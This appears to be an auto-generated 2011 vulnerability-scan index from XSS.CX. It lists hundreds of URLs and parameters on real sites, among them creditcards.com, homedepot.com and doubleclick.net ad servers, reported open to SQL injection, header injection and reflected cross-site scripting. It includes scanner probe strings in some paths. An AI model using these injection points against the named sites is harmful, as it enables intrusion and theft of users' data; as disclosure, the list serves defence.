XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 06172011-01

Report generated by XSS.CX at Fri Jun 17 06:40:33 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

1.1. http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5 [name of an arbitrarily supplied request parameter]

1.2. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s92218100172467 [REST URL parameter 3]

1.3. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s93293816028162 [REST URL parameter 1]

1.4. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s95104773896746 [REST URL parameter 2]

1.5. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s95972011631820 [REST URL parameter 1]

1.6. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s9749755890574 [REST URL parameter 2]

1.7. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s99864659090526 [REST URL parameter 1]

1.8. http://oimg.nbcuni.com/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s3955301146022 [REST URL parameter 1]

1.9. http://oimg.nbcuni.com/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s45199479965958 [REST URL parameter 2]

1.10. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s19508665378671 [REST URL parameter 4]

1.11. http://r.turn.com/r/beacon [name of an arbitrarily supplied request parameter]

1.12. http://r.turn.com/r/beacon [rds cookie]

1.13. http://r.turn.com/r/beacon [rrs cookie]

1.14. http://script.footprintlive.com/ [site parameter]

1.15. http://tap.rubiconproject.com/oz/sensor [Referer HTTP header]

1.16. http://tap.rubiconproject.com/oz/sensor [User-Agent HTTP header]

1.17. http://tap.rubiconproject.com/oz/sensor [cd cookie]

1.18. http://tap.rubiconproject.com/oz/sensor [cd parameter]

1.19. http://tap.rubiconproject.com/oz/sensor [csi2 cookie]

1.20. http://tap.rubiconproject.com/oz/sensor [dq cookie]

1.21. http://tap.rubiconproject.com/oz/sensor [k parameter]

1.22. http://tap.rubiconproject.com/oz/sensor [khaos cookie]

1.23. http://tap.rubiconproject.com/oz/sensor [lm cookie]

1.24. http://tap.rubiconproject.com/oz/sensor [name of an arbitrarily supplied request parameter]

1.25. http://tap.rubiconproject.com/oz/sensor [put_1185 cookie]

1.26. http://tap.rubiconproject.com/oz/sensor [put_1197 cookie]

1.27. http://tap.rubiconproject.com/oz/sensor [put_1512 cookie]

1.28. http://tap.rubiconproject.com/oz/sensor [put_1994 cookie]

1.29. http://tap.rubiconproject.com/oz/sensor [put_2054 cookie]

1.30. http://tap.rubiconproject.com/oz/sensor [put_2101 cookie]

1.31. http://tap.rubiconproject.com/oz/sensor [rdk cookie]

1.32. http://tap.rubiconproject.com/oz/sensor [rdk15 cookie]

1.33. http://tap.rubiconproject.com/oz/sensor [rpb cookie]

1.34. http://tap.rubiconproject.com/oz/sensor [ses15 cookie]

1.35. http://tap.rubiconproject.com/oz/sensor [ses2 cookie]

1.36. http://tap.rubiconproject.com/oz/sensor [xt parameter]

1.37. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s11473368444548 [REST URL parameter 4]

1.38. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s11999640008134 [REST URL parameter 6]

1.39. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s12511742944840 [REST URL parameter 3]

1.40. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s12586278942128 [REST URL parameter 1]

1.41. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s12715079787576 [REST URL parameter 2]

1.42. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s13481482698842 [REST URL parameter 4]

1.43. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s1405035742937 [REST URL parameter 1]

1.44. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s14229447680702 [REST URL parameter 6]

1.45. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s14671218963339 [REST URL parameter 3]

1.46. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s14691738680163 [REST URL parameter 2]

1.47. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s15323097258507 [REST URL parameter 4]

1.48. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s15357372987793 [REST URL parameter 3]

1.49. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s15506593697366 [REST URL parameter 1]

1.50. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s15620280432453 [REST URL parameter 1]

1.51. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s1593516894569 [REST URL parameter 1]

1.52. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s1593516894569 [REST URL parameter 6]

1.53. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s16203244941575 [REST URL parameter 5]

1.54. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s16457054631772 [REST URL parameter 5]

1.55. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s19969816370798 [REST URL parameter 4]

1.56. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s23837734712508 [REST URL parameter 5]

1.57. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s24903706079207 [REST URL parameter 6]

1.58. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s26866058967834 [REST URL parameter 6]

1.59. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s28965976873370 [REST URL parameter 6]

1.60. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s29808383558389 [REST URL parameter 1]

1.61. http://www.creditcards.com/oc/ [pid parameter]

1.62. http://www.creditcards.com/oc//%2522ns%253D%2522netsparker%25280x000132%2529) [name of an arbitrarily supplied request parameter]

1.63. http://www.creditcards.com/oc/Netsparker8d82b62392124f8783667c0217ea8f35/ [name of an arbitrarily supplied request parameter]

1.64. http://www.creditcards.com/oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/ [name of an arbitrarily supplied request parameter]

1.65. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [Coradiantuserid cookie]

1.66. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [RES_TRACKINGID cookie]

1.67. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [THD_SESSION cookie]

1.68. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [URL parameter]

1.69. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [check parameter]

1.70. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [jspStoreDir parameter]

1.71. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [langId parameter]

1.72. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [s_vi cookie]

1.73. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemDisplay [catalogId parameter]

1.74. http://www.nutter.com/attorneys.php [AttorneyID parameter]

1.75. http://www.nutter.com/attorneys.php [name of an arbitrarily supplied request parameter]

2. HTTP header injection

2.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

2.2. http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.3 [REST URL parameter 1]

2.3. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4 [REST URL parameter 1]

2.4. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8 [REST URL parameter 1]

2.5. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber [REST URL parameter 1]

2.6. http://ad.doubleclick.net/adi/interactive.wsj.com/forgotpassword [REST URL parameter 1]

2.7. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub [REST URL parameter 1]

2.8. http://ad.doubleclick.net/adj/N1057.280341.AOL.COMADVERTISING/B5447531.7 [REST URL parameter 1]

2.9. http://ad.doubleclick.net/adj/N4190.advertising.com/B5416523.2 [REST URL parameter 1]

2.10. http://ad.doubleclick.net/adj/N6046.134363.2043285697521/B5118749.4 [REST URL parameter 1]

2.11. http://ad.doubleclick.net/adj/interactive.wsj.com/front_nonsub [REST URL parameter 1]

2.12. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus [REST URL parameter 1]

2.13. http://ad.doubleclick.net/adj/nbcu.cnbc/news_us [REST URL parameter 1]

2.14. http://ad.doubleclick.net/adj/nbcu.cnbc/search [REST URL parameter 1]

2.15. http://ads.cleveland.com/RealMedia/ads/adstream.cap [c parameter]

2.16. http://ads.cleveland.com/RealMedia/ads/adstream.cap [va parameter]

2.17. http://ads.nj.com/RealMedia/ads/adstream.cap [c parameter]

2.18. http://ads.nj.com/RealMedia/ads/adstream.cap [va parameter]

2.19. http://ads.oregonlive.com/RealMedia/ads/adstream.cap [c parameter]

2.20. http://ads.oregonlive.com/RealMedia/ads/adstream.cap [va parameter]

2.21. http://c7.zedo.com/img/bh.gif [a parameter]

2.22. http://matcher.bidder7.mookie1.com/google [cver parameter]

2.23. http://tacoda.at.atwola.com/rtx/r.gif [N cookie]

2.24. http://tacoda.at.atwola.com/rtx/r.gif [si parameter]

2.25. http://www.wunderground.com/dotset.php [id parameter]

2.26. http://www.wunderground.com/dotset.php [name of an arbitrarily supplied request parameter]

3. Cross-site scripting (reflected)

3.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

3.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

3.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

3.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

3.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

3.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

3.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

3.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

3.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

3.10. http://a.rfihub.com/sed [pa parameter]

3.11. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4 [name of an arbitrarily supplied request parameter]

3.12. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4 [sz parameter]

3.13. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8 [name of an arbitrarily supplied request parameter]

3.14. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8 [sz parameter]

3.15. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus [site parameter]

3.16. http://ad.doubleclick.net/adj/nbcu.cnbc/news_us [site parameter]

3.17. http://ad.doubleclick.net/adj/nbcu.cnbc/search [site parameter]

3.18. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

3.19. http://admeld.adnxs.com/usersync [admeld_callback parameter]

3.20. http://adnxs.revsci.net/imp [Z parameter]

3.21. http://adnxs.revsci.net/imp [s parameter]

3.22. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

3.23. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

3.24. http://ads.pointroll.com/PortalServe/ [dom parameter]

3.25. http://ads.pointroll.com/PortalServe/ [flash parameter]

3.26. http://ads.pointroll.com/PortalServe/ [redir parameter]

3.27. http://ads.pointroll.com/PortalServe/ [time parameter]

3.28. http://adsfac.us/ag.asp [cc parameter]

3.29. http://api.bizographics.com/v1/profile.json [&callback parameter]

3.30. http://api.bizographics.com/v1/profile.json [api_key parameter]

3.31. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

3.32. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

3.33. http://api.cnbc.com/api/movers/movers.asp [chartType parameter]

3.34. http://api.cnbc.com/api/movers/movers.asp [rowCount parameter]

3.35. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.36. http://b.scorecardresearch.com/beacon.js [c10 parameter]

3.37. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.38. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.39. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.40. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.41. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.42. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.43. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 2]

3.44. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 3]

3.45. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 4]

3.46. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 5]

3.47. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 6]

3.48. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 [REST URL parameter 7]

3.49. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 2]

3.50. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 3]

3.51. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 4]

3.52. http://click.linksynergy.com/fs-bin/click [offerid parameter]

3.53. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [REST URL parameter 2]

3.54. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [REST URL parameter 3]

3.55. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [REST URL parameter 4]

3.56. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [REST URL parameter 5]

3.57. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [dom parameter]

3.58. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [flash parameter]

3.59. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [name of an arbitrarily supplied request parameter]

3.60. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [pid parameter]

3.61. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [pos parameter]

3.62. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [r parameter]

3.63. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [redir parameter]

3.64. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [time parameter]

3.65. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [REST URL parameter 2]

3.66. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [REST URL parameter 3]

3.67. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [REST URL parameter 4]

3.68. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [REST URL parameter 5]

3.69. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [dom parameter]

3.70. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [flash parameter]

3.71. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [name of an arbitrarily supplied request parameter]

3.72. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [pid parameter]

3.73. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [pos parameter]

3.74. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [r parameter]

3.75. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [redir parameter]

3.76. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [time parameter]

3.77. http://ib.adnxs.com/ptj [redir parameter]

3.78. http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js [mpck parameter]

3.79. http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js [mpck parameter]

3.80. http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js [mpvc parameter]

3.81. http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js [mpvc parameter]

3.82. http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js [placementid parameter]

3.83. http://img.mediaplex.com/content/0/17038/128465/Billabong_728x90_Male_Stagedive.js [mpck parameter]

3.84. http://img.mediaplex.com/content/0/17038/128465/Billabong_728x90_Male_Stagedive.js [mpt parameter]

3.85. http://img.mediaplex.com/content/0/17038/128465/Billabong_728x90_Male_Stagedive.js [mpvc parameter]

3.86. http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Female_BikeRack.js [mpck parameter]

3.87. http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Female_BikeRack.js [mpt parameter]

3.88. http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Female_BikeRack.js [mpvc parameter]

3.89. http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Male_Dungey_v2.js [mpck parameter]

3.90. http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Male_Dungey_v2.js [mpt parameter]

3.91. http://img.mediaplex.com/content/0/17038/128465/Fox_300x250_Male_Dungey_v2.js [mpvc parameter]

3.92. http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_RobM.js [mpck parameter]

3.93. http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_RobM.js [mpt parameter]

3.94. http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_RobM.js [mpvc parameter]

3.95. http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_Shorts.js [mpck parameter]

3.96. http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_Shorts.js [mpt parameter]

3.97. http://img.mediaplex.com/content/0/17038/128465/Hurley_300x250_Male_Shorts.js [mpvc parameter]

3.98. http://img.mediaplex.com/content/0/17038/128465/RD_728x90_Male_Fleece.js [mpck parameter]

3.99. http://img.mediaplex.com/content/0/17038/128465/RD_728x90_Male_Fleece.js [mpt parameter]

3.100. http://img.mediaplex.com/content/0/17038/128465/RD_728x90_Male_Fleece.js [mpvc parameter]

3.101. http://img.mediaplex.com/content/0/17038/128465/Roxy_300x250_Female_Butt.js [mpck parameter]

3.102. http://img.mediaplex.com/content/0/17038/128465/Roxy_300x250_Female_Butt.js [mpt parameter]

3.103. http://img.mediaplex.com/content/0/17038/128465/Roxy_300x250_Female_Butt.js [mpvc parameter]

3.104. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpck parameter]

3.105. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpt parameter]

3.106. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpvc parameter]

3.107. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpck parameter]

3.108. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpt parameter]

3.109. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpvc parameter]

3.110. http://img.mediaplex.com/content/0/17038/128465/Roxy___Billabong_728x90_Unisex_NA.js [mpck parameter]

3.111. http://img.mediaplex.com/content/0/17038/128465/Roxy___Billabong_728x90_Unisex_NA.js [mpt parameter]

3.112. http://img.mediaplex.com/content/0/17038/128465/Roxy___Billabong_728x90_Unisex_NA.js [mpvc parameter]

3.113. http://img.mediaplex.com/content/0/17038/128465/Volcom___RCVA_300x250_Unisex_NA.js [mpck parameter]

3.114. http://img.mediaplex.com/content/0/17038/128465/Volcom___RCVA_300x250_Unisex_NA.js [mpt parameter]

3.115. http://img.mediaplex.com/content/0/17038/128465/Volcom___RCVA_300x250_Unisex_NA.js [mpvc parameter]

3.116. http://img.mediaplex.com/content/0/17412/120572/NES0005_JanWB_300x250_DC.js [mpck parameter]

3.117. http://img.mediaplex.com/content/0/17412/120572/NES0005_JanWB_300x250_DC.js [mpvc parameter]

3.118. http://img.mediaplex.com/content/0/17412/120572/NES0005_JanWB_728x90_DC.js [mpck parameter]

3.119. http://img.mediaplex.com/content/0/17412/120572/NES0005_JanWB_728x90_DC.js [mpvc parameter]

3.120. http://img.mediaplex.com/content/0/17985/125897/728x90_Mits_Res_060111.js [mpck parameter]

3.121. http://img.mediaplex.com/content/0/17985/125897/728x90_Mits_Res_060111.js [mpck parameter]

3.122. http://img.mediaplex.com/content/0/17985/125897/728x90_Mits_Res_060111.js [mpvc parameter]

3.123. http://img.mediaplex.com/content/0/17985/125897/728x90_Mits_Res_060111.js [mpvc parameter]

3.124. http://img.mediaplex.com/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js [mpck parameter]

3.125. http://img.mediaplex.com/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js [mpck parameter]

3.126. http://img.mediaplex.com/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js [mpvc parameter]

3.127. http://img.mediaplex.com/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js [mpvc parameter]

3.128. http://img.mediaplex.com/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js [mpck parameter]

3.129. http://img.mediaplex.com/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js [mpck parameter]

3.130. http://img.mediaplex.com/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js [mpvc parameter]

3.131. http://img.mediaplex.com/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js [mpvc parameter]

3.132. http://img.mediaplex.com/content/0/9608/119290/ph1-gps-locate-728x90.js [mpck parameter]

3.133. http://img.mediaplex.com/content/0/9608/119290/ph1-gps-locate-728x90.js [mpvc parameter]

3.134. http://js.revsci.net/gateway/gw.js [csid parameter]

3.135. http://oc.creditcards.com/trans_node.php [c parameter]

3.136. http://oc.creditcards.com/trans_node.php [name of an arbitrarily supplied request parameter]

3.137. http://pixel.adsafeprotected.com/jspix [advId parameter]

3.138. http://pixel.adsafeprotected.com/jspix [anId parameter]

3.139. http://pixel.adsafeprotected.com/jspix [campId parameter]

3.140. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

3.141. http://pixel.adsafeprotected.com/jspix [pubId parameter]

3.142. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

3.143. http://r.turn.com/server/pixel.htm [fpid parameter]

3.144. http://r.turn.com/server/pixel.htm [sp parameter]

3.145. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]

3.146. http://search.cnbc.com/main.do [keywords parameter]

3.147. http://search.cnbc.com/main.do [keywords parameter]

3.148. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

3.149. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

3.150. http://view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

3.151. http://view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

3.152. http://view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

3.153. http://view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

3.154. http://view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

3.155. http://view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

3.156. http://www.creditcards.com/0-apr-credit-cards.php [name of an arbitrarily supplied request parameter]

3.157. http://www.creditcards.com/instant-approval.php [name of an arbitrarily supplied request parameter]

3.158. http://www.creditcards.com/oc/ ['"--> parameter]

3.159. http://www.creditcards.com/oc/ [name of an arbitrarily supplied request parameter]

3.160. http://www.creditcards.com/oc/ [nsextt parameter]

3.161. http://www.creditcards.com/oc/ [nsextt parameter]

3.162. http://www.creditcards.com/oc/ [pg parameter]

3.163. http://www.creditcards.com/oc/ [pg parameter]

3.164. http://www.creditcards.com/oc/ [pgpos parameter]

3.165. http://www.creditcards.com/oc/ [pgpos parameter]

3.166. http://www.creditcards.com/oc/ [pid parameter]

3.167. http://www.creditcards.com/oc/ [pid parameter]

3.168. http://www.creditcards.com/oc//%2522ns%253D%2522netsparker%25280x000132%2529) [name of an arbitrarily supplied request parameter]

3.169. http://www.creditcards.com/oc//%2522ns%253D%2522netsparker%25280x000132%2529) [name of an arbitrarily supplied request parameter]

3.170. http://www.creditcards.com/oc/Netsparker8d82b62392124f8783667c0217ea8f35/ [name of an arbitrarily supplied request parameter]

3.171. http://www.creditcards.com/oc/Netsparker8d82b62392124f8783667c0217ea8f35/ [name of an arbitrarily supplied request parameter]

3.172. http://www.creditcards.com/oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/ [name of an arbitrarily supplied request parameter]

3.173. http://www.creditcards.com/oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/ [name of an arbitrarily supplied request parameter]

3.174. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation [rpp parameter]

3.175. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation [keyword parameter]

3.176. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation [keyword parameter]

3.177. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation [keyword parameter]

3.178. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation [keyword parameter]

3.179. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation [omni parameter]

3.180. http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay [Overlay_Type parameter]

3.181. http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay [basePage parameter]

3.182. http://www.homedepot.com/webapp/wcs/stores/servlet/Bopis2OverLay [storeSkuNum parameter]

3.183. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemAddService [catEntryId_1 parameter]

3.184. http://www.nutter.com/attorneys.php [AttorneyID parameter]

3.185. http://www.nutter.com/attorneys.php [AttorneyID parameter]

3.186. http://www.nutter.com/attorneys.php [name of an arbitrarily supplied request parameter]

3.187. http://www.res-x.com/ws/r2/Resonance.aspx [cb parameter]

3.188. http://www.res-x.com/ws/r2/Resonance.aspx [clk parameter]

3.189. http://www.res-x.com/ws/r2/Resonance.aspx [sc parameter]

3.190. http://adnxs.revsci.net/imp [Referer HTTP header]

3.191. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

3.192. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [Referer HTTP header]

3.193. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [Referer HTTP header]

3.194. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

3.195. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

3.196. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

3.197. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

3.198. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

3.199. http://ar.voicefive.com/bmx3/broker.pli [ar_p101866669 cookie]

3.200. http://ar.voicefive.com/bmx3/broker.pli [ar_p101945457 cookie]

3.201. http://ar.voicefive.com/bmx3/broker.pli [ar_p104567837 cookie]

3.202. http://ar.voicefive.com/bmx3/broker.pli [ar_p20101109 cookie]

3.203. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

3.204. http://ar.voicefive.com/bmx3/broker.pli [ar_p56282763 cookie]

3.205. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

3.206. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

3.207. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

3.208. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

3.209. http://ar.voicefive.com/bmx3/broker.pli [ar_p91143664 cookie]

3.210. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

3.211. http://ar.voicefive.com/bmx3/broker.pli [ar_p97464717 cookie]

3.212. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js [ruid cookie]

3.213. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js [ruid cookie]

3.214. http://optimized-by.rubiconproject.com/a/dk.html [ruid cookie]

3.215. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

3.216. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf [meld_sess cookie]

3.217. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf [meld_sess cookie]

3.218. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf [meld_sess cookie]

3.219. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf [meld_sess cookie]

3.220. http://view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

4. Flash cross-domain policy

4.1. http://a.rfihub.com/crossdomain.xml

